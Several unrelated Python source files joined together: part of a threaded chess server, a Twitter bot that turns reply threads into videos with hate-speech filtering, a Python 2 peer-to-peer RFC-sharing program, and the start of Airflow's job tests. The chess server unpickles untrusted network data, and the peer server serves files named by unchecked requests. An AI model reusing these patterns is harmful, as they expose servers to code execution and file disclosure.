possibleMoves = pickle.loads(possibleMoves)
print(possibleMoves)
chessGame.possible = possibleMoves
elif "GetBoardPosition" in data:
# Return current board position
boardPosition = chessGame.board
boardPosition = pickle.dumps(boardPosition)
conn.sendall(boardPosition)
elif "CheckOtherPlayer" in data:
# Return if the player with the black pieces is in the game
# check if the total number of connections are even or odd
otherPlayer = False
if totalConn % 2 == 0:
otherPlayer = True
conn.send(otherPlayer)
totalConn -= 1
conn.close()
def start():
global totalConn
server.listen()
print("[LISTENING] on " + SERVER)
while True:
conn, address = server.accept()
print("[CONNECTED] PLAYER JOINED")
totalConn = threading.activeCount() - 1
# check if there is another game with only one player
if totalConn % 2 == 0:
# if not, add a new chess game to all chess games dictionary
chessGame = Board()
allChessGames[totalConn] = chessGame
else:
# chess game is the newest on the dictionary
chessGame = allChessGames[totalConn - 1]
thread = threading.Thread(target=handle_client, args=(conn, address, chessGame, totalConn))
thread.start()
print(f" \nACTIVE CONNECTIONS: {threading.activeCount() - 1}")
print("[STARTING] server is starting...")
start()
|
main.py
|
from datetime import datetime, timezone
import sys
import json
from update_queue_lenght import update_queue_length
sys.path.append('./objection_engine')
sys.path.append('./video-splitter')
from collections import Counter
import tweepy
import re
import time
import os
from persistqueue import Queue
import threading
import random
import settings
from hatesonar import Sonar
from better_profanity import profanity
from comment_list_brige import Comment
from objection_engine import render_comment_list, is_music_available, get_all_music_available
from cacheout import LRUCache
splitter = __import__("ffmpeg-split")
sonar = Sonar()
mention_queue = Queue('queue')
delete_queue = Queue('delete')
profanity.load_censor_words_from_file('banlist.txt')
available_songs = get_all_music_available()
cache = LRUCache()
def filter_beginning_mentions(match):
mentions = match[0].strip().split(' ')
index = next((index for index,x in enumerate(mentions) if x in mentions[:index]), len(mentions))
message = ' '.join(mentions[index:])
return message + ' ' if len(message) > 0 else message
def sanitize_tweet(tweet, previous_tweet):
user_mentions = set()
if previous_tweet is not None:
user_mentions.update(mention["screen_name"] for mention in previous_tweet.entities["user_mentions"])
user_mentions.add(previous_tweet.user.screen_name)
mentions_pattern = "|".join(user_mentions)
tweet.full_text = re.sub(f'^(@({mentions_pattern}) )+', filter_beginning_mentions, tweet.full_text)
tweet.full_text = re.sub(r'(https)\S*', '(link)', tweet.full_text)
sonar_prediction = sonar.ping(tweet.full_text)
hate_classification = next((x for x in sonar_prediction['classes'] if x['class_name'] == 'hate_speech'), None)
if (hate_classification["confidence"] > 0.6):
tweet.full_text = '...'
tweet.full_text = profanity.censor(tweet.full_text)
return hate_classification["confidence"] > 0.8
def update_id(id):
with open('id.txt', 'w') as idFile:
idFile.write(id)
def postVideoTweet(reply_id, filename):
uploaded_media = api.media_upload(filename, media_category='TWEET_VIDEO')
while (uploaded_media.processing_info['state'] == 'pending'):
time.sleep(uploaded_media.processing_info['check_after_secs'])
uploaded_media = api.get_media_upload_status(uploaded_media.media_id_string)
time.sleep(10)
return api.update_status('Your video is ready. Do you want it removed? contact @/LuisMayoV', in_reply_to_status_id=reply_id, auto_populate_reply_metadata = True, media_ids=[uploaded_media.media_id_string])
def check_mentions():
global lastId
global mention_queue
global render_regex
while True:
try:
mentions = api.mentions_timeline(count='200', tweet_mode="extended") if lastId == None else api.mentions_timeline(since_id=lastId, count='200', tweet_mode="extended")
if len(mentions) > 0:
lastId = mentions[0].id_str
for tweet in mentions[::-1]:
if re.search(render_regex, tweet.full_text) is not None:
mention_queue.put(tweet)
print(mention_queue.qsize())
if 'delete' in tweet.full_text:
delete_queue.put(tweet)
update_id(lastId)
except Exception as e:
print(e)
time.sleep(20)
def process_deletions():
global delete_queue
def process_tweets():
global mention_queue
global update_queue_params
global me
while True:
try:
tweet = mention_queue.get()
update_queue_params['last_time'] = tweet.created_at
thread = []
current_tweet = tweet
previous_tweet = None
# The cache key is the key for the cache, it consists on the tweet ID and the selected music
cache_key = None
if 'music=' in tweet.full_text:
music_tweet = tweet.full_text.split('music=', 1)[1][:3]
else:
music_tweet = 'PWR'
if current_tweet is not None and (current_tweet.in_reply_to_status_id_str or hasattr(current_tweet, 'quoted_status_id_str')):
cache_key = (current_tweet.in_reply_to_status_id_str or current_tweet.quoted_status_id_str) + '/' + music_tweet.lower()
cached_value = cache.get(cache_key)
if not is_music_available(music_tweet): # If the music is written badly in the mention tweet, the bot will remind how to write it properly
try:
api.update_status('The music argument format is incorrect. The posibilities are: \n' + '\n'.join(available_songs), in_reply_to_status_id=tweet.id_str, auto_populate_reply_metadata = True)
except Exception as musicerror:
print(musicerror)
elif cached_value is not None:
api.update_status('I\'ve already done that, here you have ' + cached_value, in_reply_to_status_id=tweet.id_str, auto_populate_reply_metadata = True)
else:
i = 0
# If we have 2 hate detections we stop rendering the video all together
hate_detections = 0
# In the case of Quotes I have to check for its presence instead of whether its None because Twitter API designers felt creative that week
while (current_tweet is not None) and (current_tweet.in_reply_to_status_id_str or hasattr(current_tweet, 'quoted_status_id_str')):
try:
current_tweet = previous_tweet or api.get_status(current_tweet.in_reply_to_status_id_str or current_tweet.quoted_status_id_str, tweet_mode="extended")
if current_tweet.in_reply_to_status_id_str or hasattr(current_tweet, 'quoted_status_id_str'):
previous_tweet = api.get_status(current_tweet.in_reply_to_status_id_str or current_tweet.quoted_status_id_str, tweet_mode="extended")
else:
previous_tweet = None
# Refusing to render zone
if re.search(render_regex, current_tweet.full_text) is not None and any(user['id_str'] == me for user in current_tweet.entities['user_mentions']):
break
if sanitize_tweet(current_tweet, previous_tweet):
hate_detections += 1
if hate_detections >= 2:
api.update_status('I\'m sorry. The thread may contain unwanted topics and I refuse to render them.', in_reply_to_status_id=tweet.id_str, auto_populate_reply_metadata = True)
clean(thread, None, [])
thread = []
break
# End of refusing to render zone
thread.insert(0, Comment(current_tweet).to_message())
i += 1
if (current_tweet is not None and i >= settings.MAX_TWEETS_PER_THREAD):
current_tweet = None
api.update_status(f'Sorry, the thread was too long, I\'ve only retrieved {i} tweets', in_reply_to_status_id=tweet.id_str, auto_populate_reply_metadata = True)
except tweepy.error.TweepError as e:
try:
api.update_status('I\'m sorry. I wasn\'t able to retrieve the full thread. Deleted tweets or private accounts may exist', in_reply_to_status_id=tweet.id_str, auto_populate_reply_metadata = True)
except Exception as second_error:
print (second_error)
current_tweet = None
if (len(thread) >= 1):
output_filename = tweet.id_str + '.mp4'
render_comment_list(thread, music_code= music_tweet, output_filename=output_filename)
files = splitter.split_by_seconds(output_filename, 140, vcodec='libx264')
reply_to_tweet = tweet
first_tweet = True
try:
for file_name in files:
reply_to_tweet = postVideoTweet(reply_to_tweet.id_str, file_name)
if first_tweet:
cached_value = f'https://twitter.com/{me_response.screen_name}/status/{reply_to_tweet.id_str}'
cache.add(cache_key, cached_value)
first_tweet = False
except tweepy.error.TweepError as e:
limit = False
try:
print(e.api_code)
if (e.api_code == 185):
print("I'm Rated-limited :(")
limit = True
mention_queue.put(tweet)
time.sleep(900)
except Exception as parsexc:
print(parsexc)
try:
if not limit:
api.update_status(str(e), in_reply_to_status_id=tweet.id_str, auto_populate_reply_metadata = True)
except Exception as second_error:
print(second_error)
print(e)
clean(thread, output_filename, files)
time.sleep(1)
except Exception as e:
clean(thread, None, [])
print(e)
def clean(thread, output_filename, files):
global mention_queue
# We mark the task as done so it deletes the element from the queue on disk
mention_queue.task_done()
try:
for comment in thread:
if (hasattr(comment, 'evidence') and comment.evidence is not None):
os.remove(comment.evidence)
except Exception as second_e:
print(second_e)
try:
for file_name in files:
os.remove(file_name)
except Exception as second_e:
print(second_e)
try:
if output_filename is not None:
os.remove(output_filename)
except Exception as second_e:
print(second_e)
################################## Main
# Load keys
with open('keys.json', 'r') as keyfile:
keys = json.load(keyfile)
# Load last ID
try:
with open('id.txt', 'r') as idFile:
lastId = idFile.read()
except FileNotFoundError:
lastId = None
# Init
auth = tweepy.OAuthHandler(keys['consumerApiKey'], keys['consumerApiSecret'])
auth.set_access_token(keys['accessToken'], keys['accessTokenSecret'])
api = tweepy.API(auth)
me_response = api.me()
# render_regex = f'^ *@{me_response.screen_name} render'
render_regex = 'render'
me = me_response.id_str
update_queue_params = {
'queue': mention_queue,
'last_time': None,
'api': api
}
producer = threading.Thread(target=check_mentions)
consumer = threading.Thread(target=process_tweets)
# threading.Thread(target=process_tweets).start()
threading.Thread(target=update_queue_length, args=[update_queue_params]).start()
producer.start()
consumer.start()
|
peer2_ks.py
|
import os
import platform
import shlex
import time
import re
import socket
import threading
OS = platform.system()
HOST = socket.gethostbyname(socket.gethostname())
RFC_Server_Port = 40004
RFC_Fetching_List = [8130,8131]
FilePath = ''
cookieNumval = None
SERVER_NAME = '10.154.0.185'
SERVER_PORT = 65423
class Peer_Addition: #To make an entry of the peer with below specified literals as its attributes
def __init__(self, hostname, cookieNum, activeFlag, ttl, port, actvcnt, recentlyactv, next_entry=None):
self.hostname = hostname
self.cookieNum = cookieNum
self.activeFlag = activeFlag
self.TTL = int(ttl)
self.list_port = int(port)
self.ActvCnt = int(actvcnt)
self.RecentlyActv = recentlyactv
self.next_entry = next_entry
def get_next(self): #initialising getters and setters of all the attributes in class Peer_Addition
return self.next_entry
def get_hostname(self):
return self.hostname
def get_cookieNum(self):
return self.cookieNum
def get_activeFlag(self):
return self.activeFlag
def get_TTL(self):
return self.TTL
def get_list_port(self):
return self.list_port
def get_ActvCnt(self):
return self.ActvCnt
def get_RecentlyActv(self):
return self.RecentlyActv
def set_next(self, new_next):
self.next_entry = new_next
def set_hostname(self, hostname):
self.hostname = hostname
def set_list_port(self, port):
self.list_port = port
def set_cookieNum(self, cookieNumNo):
self.cookieNum = cookieNumNo
def set_activeFlag(self, activeFlag):
self.activeFlag = activeFlag
def set_TTL(self, ttl):
self.TTL = ttl
def set_ActvCnt(self):
self.ActvCnt = actvcnt
def set_RecentlyActv(self):
self.RecentlyActv = recentlyactv
class Peer_Index(): #This object will be instantiated when a peer index gets updated or added or called to fetch a value(like port num)
def __init__(self, head=None):
self.head = head
def get_head(self):
return self.head
def set_head(self, head):
self.head = head
def CreateEntry(self, hostname, cookieNum, activeFlag, ttl, port, actvcnt, recentlyactv): #method to create an entry within a Peer_Index
new_entry = Peer_Addition(hostname, cookieNum, activeFlag, ttl, port, actvcnt, recentlyactv)
new_entry.set_next(self.head)
self.head = new_entry
def GetPort(self, hostname): # Fetching the port number from the Peer Index
current = self.head
while current != None:
if current.hostname == hostname:
return current.get_list_port()
current = current.get_next()
print "ERROR! There is no port associated with %s\n" % (hostname)
def Display(self): # To display the PI table
current = self.head
print "Peer-Index:--->"
print "Hostname\tcookieNum\tActive Flag\tTTL\tListening Port\tRegistration count\tRecent Registration time\n"
while current != None:
print "%s\t%s\t%s\t%d\t%d\t\t%d\t\t%s" % (
current.hostname, current.cookieNum, current.activeFlag, current.TTL, current.list_port, current.ActvCnt,
current.RecentlyActv)
current = current.next_entry
class RFC_Addition(): # Object to initialize RFC Entry
def __init__(self, RFCno=0, RFCtitle='', hostname=socket.gethostbyname(socket.gethostname()), ttl=7200,
next_entry=None):
self.RFCno = str(RFCno)
self.RFCtitle = str(RFCtitle)
self.hostname = str(hostname)
self.TTL = int(ttl)
self.next_entry = next_entry
def get_next(self):
return self.next_entry
def get_RFCno(self):
return self.RFCno
def get_RFCtitle(self):
return self.RFCtitle
def get_hostname(self):
return self.hostname
def get_TTL(self):
return self.TTL
def set_next(self, new_next):
self.next_entry = new_next
def set_TTL(self, ttl):
self.TTL = ttl
class RFC_Index(): #Object to create, update and search for an attribute within RFC_Index
def __init__(self, head=None):
self.head = head
def get_head(self):
return self.head
def CreateEntry(self, RFCno, RFCtitle, hostname, ttl):
new_entry = RFC_Addition(RFCno, RFCtitle, hostname, ttl)
new_entry.set_next(self.head)
self.head = new_entry
def LocalRFC_Search(self, RFCno): # B4 Initializing a contact with the RS for Active peer index doing self check for available RFC's
global HOST
current = self.head
while current != None:
if current.hostname == HOST:
if current.RFCno == str(RFCno):
print "RFC %d is already present on the local system\n" % (RFCno)
return True
current = current.next_entry
print "Contacting RS server for obtaining RFC %d......\n" % (RFCno)
return False
def Check_DuplicateEntry(self, RFCno, hostname): # To Check for duplicate entry before appending peer RFC Index to local Index
current = self.head
while current != None:
if current.RFCno == str(RFCno) and current.hostname == hostname:
return True
else:
current = current.next_entry
return False
def SearchRFC_Index(self, RFCno): # To search the merged RFC-Index for the required RFC
current = self.head
status = False
print "Searching Merged RFC-Index....\n"
while current != None:
if current.hostname != HOST:
if current.RFCno == str(RFCno):
status = True
return (status, current.hostname)
current = current.next_entry
print " RFC %d is not found !\n" % (RFCno)
return (status, None)
def UpdateRFC_List(self): # Update RFC Index local file list
current = self.head
entry = str(current.get_RFCno()) + "\t" + str(current.get_RFCtitle()) + "\t" + str(
current.get_hostname()) + "\t" + str(current.get_TTL()) + "\n"
return entry
def display(self):
current = self.head
print "RFC-Index\n"
while current != None:
print "%s\t%s\t%s\t%d" % (current.RFCno, current.RFCtitle, current.hostname, current.TTL)
current = current.next_entry
def GenerateIndex_Response(self): # To send across the whole RFC-Index
global HOST
global OS
current = self.head
message = "P2P-DI/1.0(%^&***)200(%^&***)OK(%^&***)Host:(%^&***)" + HOST + "(%^&***)OS:(%^&***)" + OS
print "P2P-DI/1.0 200 OK Host:" + HOST + "OS:" + OS
while current != None:
data = str(current.get_RFCno()) + '(%^&***)' + str(current.get_RFCtitle()) + '(%^&***)' + str(
current.get_hostname()) + '(%^&***)' + str(current.get_TTL())
message = message + "(%^&***)" + data
print "...\n"
current = current.next_entry
return message
def Get_LocalFile_List(): # To obtain list of RFCs already present on localhost
global FilePath
files = []
count = 0
for file in os.listdir(FilePath):
if file.startswith("8"):
count += 1
files.append(os.path.splitext(file)[0])
return (files, count)
def Get_FileTitle(): # To obtain RFC titles of local RFCs
global FilePath
title = []
start = 0
end = 0
for file in os.listdir(FilePath):
if file.startswith("8"):
f = open(file, "r")
content = f.read()
f.close()
contents = str(content)
c = re.split('(\W+)',contents) #RE package is used to split the strings into individual part and then fetched to get the title of the RFC
elem = 0
count = 0
for elem in c:
if elem == "2017":
start = count
break
count += 1
elem = 0
count = 0
for elem in c:
if elem == "Abstract":
end = count
break
count += 1
hd = ''
for elem in range(start + 1, end):
hd = hd + " " + c[elem]
title.append(hd)
return title
def ServerMain(socket, addr, object): #Function implementing RFC Server functionalities like sending RFC index to RS
global FilePath
global HOST
global OS
msg = socket.recv(1024)
message = str.split(msg, "(%^&***)")
if message[0] == 'GET':
if message[1] == 'RFC-INDEX':
print "Sending RFC-INDEX to %s.....\n" % (str(addr))
response = object.GenerateIndex_Response()
socket.send(response)
print "Finished sending RFC-Index to %s\n" % (str(addr))
elif message[1] == 'RFC':
os.chdir(FilePath) # Changes CWD to 'CWD\IP_Project'
print "Sending RFC %s to %s......\n" % (message[2], str(addr))
response = "P2P-DI/1.0(%^&***)200(%^&***)OK(%^&***)Host:(%^&***)" + HOST + "(%^&***)OS:(%^&***)" + OS
print "P2P-DI/1.0 200 OK Host:" + HOST + "OS:" + OS
filename = str(message[2]) + ".txt"
if os.path.isfile(filename):
with open(filename, "r") as f:
filedata = f.read()
response = response + "(%^&***)" + filedata
socket.send(response)
print "Finished sending RFC %s to %s\n" % (message[2], str(addr))
socket.close()
def ServerModule(object): #Function implementing RFC Server socket attributes
global HOST
global RFC_Server_Port
server_socket = socket.socket()
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server_socket.bind((HOST, RFC_Server_Port))
server_socket.listen(25)
print "Starting server.....\n"
while True:
client_socket, addr = server_socket.accept()
print "Connection from: " + str(addr)
MainThread = threading.Thread(target=ServerMain, args=(client_socket, addr, object,))
MainThread.start()
def Generate_KeepAlive(): #Function to implement KeepAlive message constantly after every 10 secs
global SERVER_NAME
global SERVER_PORT
global HOST
global OS
global cookieNumval
KAsock = socket.socket()
KAsock.connect((SERVER_NAME, SERVER_PORT))
while True:
time.sleep(20)
message = "KEEPALIVE(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)" + HOST + "(%^&***)cookieNum:(%^&***)" + str(
cookieNumval) + "(%^&***)OS:(%^&***)" + OS
print "KEEPALIVE P2P-DI/1.0 Host:" + HOST + "cookieNum:" + str(cookieNumval) + "OS:" + OS
print "\nKEEP ALIVE!!!!\n"
KAsock.send(message)
KAsock.close()
def Leave_Func(): #Function to implement leave functionality for peer from the Registration Server
global SERVER_NAME
global SERVER_PORT
global HOST
global OS
global cookieNumval
s = socket.socket()
s.connect((SERVER_NAME, SERVER_PORT))
message = "LEAVE(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)" + HOST + "(%^&***)cookieNum:(%^&***)" + str(
cookieNumval) + "(%^&***)OS:(%^&***)" + OS
print "LEAVE P2P-DI/1.0 Host:" + HOST + "cookieNum:" + str(cookieNumval) + "OS:" + OS
s.send(message)
rep = s.recv(1024)
reply = str.split(rep, "(%^&***)")
if reply[1] == "200" and reply[2] == "OK":
print "Leaving the P2P network"
return message
def main():
global SERVER_NAME
global SERVER_PORT
global HOST
global RFC_Server_Port
global OS
global RFC_Fetching_List
global FilePath
global cookieNumval
wd = os.getcwd()
if OS == "Windows":
directory = wd + "\IP_Project\Client"
else:
directory = wd + "/IP_Project"
if not os.path.exists(directory):
os.makedirs(directory)
FilePath = directory
os.chdir(FilePath)
RFCtable = RFC_Index()
Peertable = Peer_Index()
f1 = open("RFC_Index.txt", "w+")
f1.write("\nRFC NUMBER\tRFC TITLE\tHOSTNAME\tTTL\n")
f1.close()
s = socket.socket()
s.connect((SERVER_NAME, SERVER_PORT))
if os.path.isfile("cookieNum.txt"):
with open("cookieNum.txt", "r") as f:
cookieNumval = f.read()
else:
cookieNumval = None
if cookieNumval != None:
message = "REGISTER(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)" + HOST + "(%^&***)cookieNum:(%^&***)" + str(
cookieNumval) + "(%^&***)Port:(%^&***)" + str(RFC_Server_Port) + "(%^&***)OS:(%^&***)" + OS
print "REGISTER P2P-DI/1.0 Host:" + HOST + "cookieNum:" + str(cookieNumval) + "Port:" + str(RFC_Server_Port) + "OS:" + OS
else:
message = "REGISTER(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)" + HOST + "(%^&***)Port:(%^&***)" + str(
RFC_Server_Port) + "(%^&***)OS:(%^&***)" + OS
s.send(message)
rep = s.recv(1024)
reply = str.split(rep, "(%^&***)")
if reply[1] == "200" and reply[2] == "OK":
print "Peer %s registered with RS\n" % (str(s.getsockname()))
cookieNumval = str(reply[4])
s.close()
f = open("cookieNum.txt", "w+")
f.write(cookieNumval)
f.close()
Keep_AliveThread = threading.Thread(target=Generate_KeepAlive, args=())
Keep_AliveThread.daemon = True
Keep_AliveThread.start()
(localfiles, count) = Get_LocalFile_List()
if not localfiles:
print "No RFCs on localhost\n"
else:
print 'RFCs on local system:\n'
for i in localfiles:
print i
title = Get_FileTitle()
print "Updating local RFCs to RFC-Index..\n"
for idx in range(0, count):
RFCtable.CreateEntry(localfiles[idx], title[idx], HOST, 7200)
entry = RFCtable.UpdateRFC_List()
os.chdir(FilePath)
f = open("RFC_Index.txt", "a+")
try:
f.write(entry)
finally:
f.close()
MainThread = threading.Thread(target=ServerModule, args=(RFCtable,))
MainThread.start()
time.sleep(20)
start_time_cumulative = time.time()
RFCtable.display()
for RFCno in RFC_Fetching_List:
status = RFCtable.LocalRFC_Search(RFCno)
if status == False:
start_time_each = time.time()
s = socket.socket()
s.connect((SERVER_NAME, SERVER_PORT))
message = "GET(%^&***)PEER-INDEX(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)" + HOST + "(%^&***)cookieNum:(%^&***)" + str(
cookieNumval) + "(%^&***)OS:(%^&***)" + OS
print "GET PEER-INDEX P2P-DI/1.0 Host:" + HOST + "cookieNum:" + str(cookieNumval) + "OS:" + OS
print "Requesting Peer-Index from RS....\n"
s.send(message)
rep = s.recv(4096)
reply = str.split(rep, "(%^&***)")
if reply[1] == "200" and reply[2] == "OK":
Peertable.set_head(None) # To CHECK!!
idx = 7
while (idx < len(reply)):
Peertable.CreateEntry(reply[idx], reply[idx + 1], reply[idx + 2], reply[idx + 3], reply[idx + 4],
reply[idx + 5], reply[idx + 6])
idx = idx + 7
print "...\n"
print "Peer-Index successfully downloaded on %s\n" % (str(s.getsockname()))
elif reply[1] == "404" and reply[2] == "ERROR":
print "ERROR: %s!\n" % (str(reply[7]))
Peertable.Display()
s.close()
current = Peertable.get_head()
while current != None:
if current.hostname != HOST:
peername = current.get_hostname()
peerport = current.get_list_port()
s = socket.socket()
s.connect((peername, peerport))
message = "GET(%^&***)RFC-INDEX(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)" + HOST + "(%^&***)OS:(%^&***)" + OS
print "GET RFC-INDEX P2P-DI/1.0 Host:" + HOST + "OS:" + OS
print "Requesting RFC-Index from Peer %s:%s....\n" % (peername, str(peerport))
s.send(message)
rep = s.recv(4096)
reply = str.split(rep, "(%^&***)")
if reply[1] == "200" and reply[2] == "OK":
idx = 7
while (idx < len(reply)):
res = RFCtable.Check_DuplicateEntry(reply[idx], reply[idx + 2])
if res == False:
RFCtable.CreateEntry(reply[idx], reply[idx + 1], reply[idx + 2], reply[idx + 3])
entry = RFCtable.UpdateRFC_List()
os.chdir(FilePath)
f = open("RFC_Index.txt", "a+")
try:
f.write(entry)
finally:
f.close()
idx = idx + 4
print "...\n"
print "RFC-Index successfully downloaded on %s\n" % (str(s.getsockname()))
else:
print "ERROR while downloading RFC-Index from peer %s:%s\n" % (peername, str(peerport))
s.close()
(status, peername) = RFCtable.SearchRFC_Index(RFCno)
if status == True:
peerport = Peertable.GetPort(peername)
s = socket.socket()
s.connect((peername, peerport))
message = "GET(%^&***)RFC(%^&***)" + str(
RFCno) + "(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)" + HOST + "(%^&***)OS:(%^&***)" + OS
print "GET RFC" + str(RFCno) + "P2P-DI/1.0 Host:" + HOST + "OS:" + OS
print "Requesting RFC %d from peer %s:%s..\n" % (RFCno, peername, str(peerport))
s.send(message)
rep = s.recv(204800)
reply = str.split(rep, "(%^&***)")
if reply[1] == "200" and reply[2] == "OK":
idx = 7
filename = str(RFCno) + ".txt"
f = open(filename, "w+")
f.write(reply[7])
f.close()
end_time_each = time.time()
print "RFC %d successfully downloaded!\n" % (RFCno)
final_time_each = end_time_each - start_time_each
f = open("Timer.txt", "a+")
try:
f.write(
"\nThe time taken for obtaining RFC " + str(RFCno) + ": " + str(final_time_each))
finally:
f.close()
s.close()
break
s.close()
current = current.get_next()
if current == None:
print "RFC %d is not present with any peer\n" % (RFCno)
end_time_cumulative = time.time()
final_time_cumulative = end_time_cumulative - start_time_cumulative
f = open("Timer.txt", "a+")
try:
f.write("\nThe cumulative time taken for obtaining all required RFCs: " + str(final_time_cumulative))
finally:
f.close()
print "\nCompleted searching for all required RFCs\n"
while True:
userinput = raw_input("Leave or stay??\n")
if userinput == "leave":
LeaveSock = Leave_Func()
break
elif userinput == "stay":
print "Waiting before closing server....\n"
time.sleep(60)
Keep_AliveThread.join()
MainThread.join(10)
LeaveSock.close()
if __name__ == '__main__':
main()
|
test_jobs.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import json
import logging
import multiprocessing
import os
import shutil
import threading
import time
import unittest
from tempfile import mkdtemp
import psutil
import six
import sqlalchemy
from mock import Mock, patch, MagicMock, PropertyMock
from parameterized import parameterized
from airflow.utils.db import create_session
from airflow import AirflowException, settings, models
from airflow import configuration
from airflow.bin import cli
import airflow.example_dags
from airflow.executors import BaseExecutor, SequentialExecutor
from airflow.jobs import BaseJob, BackfillJob, SchedulerJob, LocalTaskJob
from airflow.models import DAG, DagModel, DagBag, DagRun, Pool, TaskInstance as TI, \
errors
from airflow.models.slamiss import SlaMiss
from airflow.operators.bash_operator import BashOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.task.task_runner.base_task_runner import BaseTaskRunner
from airflow.utils import timezone
from airflow.utils.dag_processing import SimpleDag, SimpleDagBag, list_py_file_paths
from airflow.utils.dates import days_ago
from airflow.utils.db import provide_session
from airflow.utils.net import get_hostname
from airflow.utils.state import State
from airflow.utils.timeout import timeout
from tests.core import TEST_DAG_FOLDER
from tests.executors.test_executor import TestExecutor
configuration.load_test_config()
logger = logging.getLogger(__name__)
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
DEV_NULL = '/dev/null'
DEFAULT_DATE = timezone.datetime(2016, 1, 1)
TRY_NUMBER = 1
# Include the words "airflow" and "dag" in the file contents,
# tricking airflow into thinking these
# files contain a DAG (otherwise Airflow will skip them)
PARSEABLE_DAG_FILE_CONTENTS = '"airflow DAG"'
UNPARSEABLE_DAG_FILE_CONTENTS = 'airflow DAG'
# Filename to be used for dags that are created in an ad-hoc manner and can be removed/
# created at runtime
TEMP_DAG_FILENAME = "temp_dag.py"
TEST_DAGS_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
class BaseJobTest(unittest.TestCase):
class TestJob(BaseJob):
__mapper_args__ = {
'polymorphic_identity': 'TestJob'
}
def __init__(self, cb):
self.cb = cb
super(BaseJobTest.TestJob, self).__init__()
def _execute(self):
return self.cb()
def test_state_success(self):
job = self.TestJob(lambda: True)
job.run()
self.assertEqual(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_sysexit(self):
import sys
job = self.TestJob(lambda: sys.exit(0))
job.run()
self.assertEqual(job.state, State.SUCCESS)
self.assertIsNotNone(job.end_date)
def test_state_failed(self):
def abort():
raise RuntimeError("fail")
job = self.TestJob(abort)
with self.assertRaises(RuntimeError):
job.run()
self.assertEqual(job.state, State.FAILED)
self.assertIsNotNone(job.end_date)
class BackfillJobTest(unittest.TestCase):
def setUp(self):
with create_session() as session:
session.query(models.DagRun).delete()
session.query(models.Pool).delete()
session.query(models.TaskInstance).delete()
self.parser = cli.CLIFactory.get_parser()
self.dagbag = DagBag(include_examples=True)
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_trigger_controller_dag(self):
dag = self.dagbag.get_dag('example_trigger_controller_dag')
target_dag = self.dagbag.get_dag('example_trigger_target_dag')
dag.clear()
target_dag.clear()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertFalse(queue.append.called)
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True
)
job.run()
scheduler = SchedulerJob()
queue = Mock()
scheduler._process_task_instances(target_dag, queue=queue)
self.assertTrue(queue.append.called)
target_dag.clear()
dag.clear()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_multi_dates(self):
dag = self.dagbag.get_dag('example_bash_operator')
dag.clear()
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=1),
ignore_first_depends_on_past=True
)
job.run()
session = settings.Session()
drs = session.query(DagRun).filter(
DagRun.dag_id == 'example_bash_operator'
).order_by(DagRun.execution_date).all()
self.assertTrue(drs[0].execution_date == DEFAULT_DATE)
self.assertTrue(drs[0].state == State.SUCCESS)
self.assertTrue(drs[1].execution_date ==
DEFAULT_DATE + datetime.timedelta(days=1))
self.assertTrue(drs[1].state == State.SUCCESS)
dag.clear()
session.close()
@unittest.skipIf('sqlite' in configuration.conf.get('core', 'sql_alchemy_conn'),
"concurrent access not supported in sqlite")
def test_backfill_examples(self):
"""
Test backfilling example dags
Try to backfill some of the example dags. Be careful, not all dags are suitable
for doing this. For example, a dag that sleeps forever, or does not have a
schedule won't work here since you simply can't backfill them.
"""
include_dags = {
'example_branch_operator',
'example_bash_operator',
'example_skip_dag',
'latest_only'
}
dags = [
dag for dag in self.dagbag.dags.values()
if 'example_dags' in dag.full_filepath and dag.dag_id in include_dags
]
for dag in dags:
dag.clear(
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
# Make sure that we have the dags that we want to test available
# in the example_dags folder, if this assertion fails, one of the
# dags in the include_dags array isn't available anymore
self.assertEqual(len(include_dags), len(dags))
for i, dag in enumerate(sorted(dags, key=lambda d: d.dag_id)):
logger.info('*** Running example DAG #{}: {}'.format(i, dag.dag_id))
job = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE,
ignore_first_depends_on_past=True)
job.run()
def test_backfill_conf(self):
dag = DAG(
dag_id='test_backfill_conf',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
task_id='op',
dag=dag)
dag.clear()
executor = TestExecutor(do_update=True)
conf = json.loads("""{"key": "value"}""")
job = BackfillJob(dag=dag,
executor=executor,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE + datetime.timedelta(days=2),
conf=conf)
job.run()
dr = DagRun.find(dag_id='test_backfill_conf')
self.assertEqual(conf, dr[0].conf)
def test_backfill_run_rescheduled(self):
dag = DAG(
dag_id='test_backfill_run_rescheduled',
start_date=DEFAULT_DATE,
schedule_interval='@daily')
with dag:
DummyOperator(
